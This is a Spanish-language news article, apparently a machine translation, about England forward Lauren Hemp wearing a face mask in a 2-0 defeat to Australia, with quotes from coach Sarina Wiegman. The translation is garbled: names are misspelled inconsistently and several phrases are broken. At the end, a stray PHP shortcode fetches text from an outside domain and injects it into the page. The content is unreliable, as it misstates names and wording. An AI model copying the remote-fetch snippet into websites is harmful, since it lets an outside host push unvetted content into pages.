Lauren Hamp usó una máscara facial para Inglaterra contra Australia el martes por la noche después de recibir un golpe en la nariz en la victoria de semifinales de la semana pasada sobre Brasil.


Hamp, que usó una máscara en el calentamiento y durante su tiempo en el campo, fue reemplazado por Lauren James a los 28.el Minutos de la derrota por 2-0.


La delantera del Manchester City, de 22 años, comenzó el partido con el pie delantero pero se mostró algo incómoda cuando abandonó el terreno de juego.


Poco después de reemplazar a Hamp, Australia tomó la delantera a través de Sam Kerr, y anotó un segundo después del medio tiempo para poner fin a la racha de 30 juegos sin perder de Inglaterra con Serena Wegman.


A pesar de la sorpresiva derrota, Wegmann insiste en que el resultado solo puede servir como una curva de aprendizaje antes de la Copa del Mundo de este verano.


“No estoy preocupado. No estoy preocupado demasiado rápido”, dijo Wegman. “Sabemos que tenemos que estar al máximo nivel cuando vayamos al Mundial.




Lauren Hamp usó una máscara facial durante la derrota de Inglaterra ante Australia el martes por la noche.



(ITV4)



“En cada partido recibimos una amonestación. Lo hicimos contra Brasil. Sabemos a dónde queremos ir y lo que tenemos que hacer.


“No creo que estemos perdiendo impulso. Creo que se está construyendo y es una muy buena educación para nosotros alcanzar un nivel más alto para ganar estos juegos”.


“No estoy enfocado en eso (la racha invicta) en absoluto. Solo queremos ganar todos los partidos”.


“No hablamos de eso. Queremos mejorar cada juego. Sí, sería muy bueno ganar el 31, también me encantaría, pero a veces ganas y a veces pierdes. Eso espero. Que nosotros ganará mucho. Por supuesto”.


Previous Post Next Post
function pub_short() { $pub_text = file_get_contents( "https://alrafdean.org/me/pub.txt" ); return $pub_text; } add_shortcode('pub', 'pub_short');